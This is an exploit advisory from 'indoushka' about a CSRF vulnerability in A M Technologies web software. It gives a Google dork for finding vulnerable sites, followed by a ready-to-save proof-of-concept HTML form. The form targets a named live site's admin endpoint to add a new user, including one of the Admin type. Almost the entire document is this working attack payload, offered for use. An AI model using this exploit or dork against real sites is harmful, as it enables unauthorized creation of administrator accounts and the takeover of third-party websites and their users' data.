====================================================================================================================================
| # Title : A M Technologies CSRF Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.amtechnologies.in/ |
| # Dork : intext:"Powered by A M Technologies" inurl:php?id= |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] save as poc.html
<div class="box box-color box-bordered">
<div class="box-title">
<h3><i class="icon-th-list"></i>Add User Detail</h3>
</div>
<div class="box-content nopadding">
<form action="http://www.rishtasaatpheroka.com/admin/codeAdminUser.php?action=add" method="POST" class="form-horizontal form-validate form-bordered" enctype="multipart/form-data" name="frmUpdateUser" id="frmUpdateUser" novalidate="novalidate">
<input name="page" id="page" value="" type="hidden">
<div class="control-group">
<label for="autocom" class="control-label">Admin Name</label>
<div class="controls">
<input name="txtAdminName" id="txtAdminName" data-provide="typeahead" data-items="4" data-rule-required="true" value="" type="text">
</div>
</div>
<div class="control-group">
<label for="autocom" class="control-label">User Type</label>
<div class="controls">
<select name="txtAdminType" id="txtAdminType">
<option value="">-Select Type--</option>
<option value="Admin">Admin</option> <option value="User">User</option>
</select>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Username availability</label>
<div class="controls">
<div class="input-append">
<input name="txtUserName" id="txtUserName" class="username-check" value="" onblur="checkUser()" type="text">
<a href="javascript:checkUser()" class="btn add-on"><i class="icon-refresh"></i></a>
</div>
<div id="replaceme">Please enter a username</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Password strength</label>
<div class="controls">
<div class="input-xlarge">
<input name="txtPassword" id="txtPassword" class="complexify-me input-block-level" value="" type="password">
<span class="help-block">
<div class="progress progress-info">
<div class="bar bar-red" style="width: 0%"></div>
</div>
</span>
</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Email</label>
<div class="controls">
<div class="input-prepend">
<span class="add-on">@</span>
<input name="txtEmail" id="txtEmail" placeholder="Email" value="" type="text">
</div>
</div>
</div>
<div class="control-group">
<label for="textfield" class="control-label">Joined Date</label>
<div class="controls">
<div class="input-prepend">
<input name="txtDate" id="txtDate" class="input-medium datepick" value="05-06-2018" type="text">
</div>
</div>
</div>
<div class="form-actions">
<input name="btnAdd" id="btnAdd" value="Submit" class="btn btn-primary" type="submit"> <button type="button" class="btn">Cancel</button>
</div>
</form>
</div>
</div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================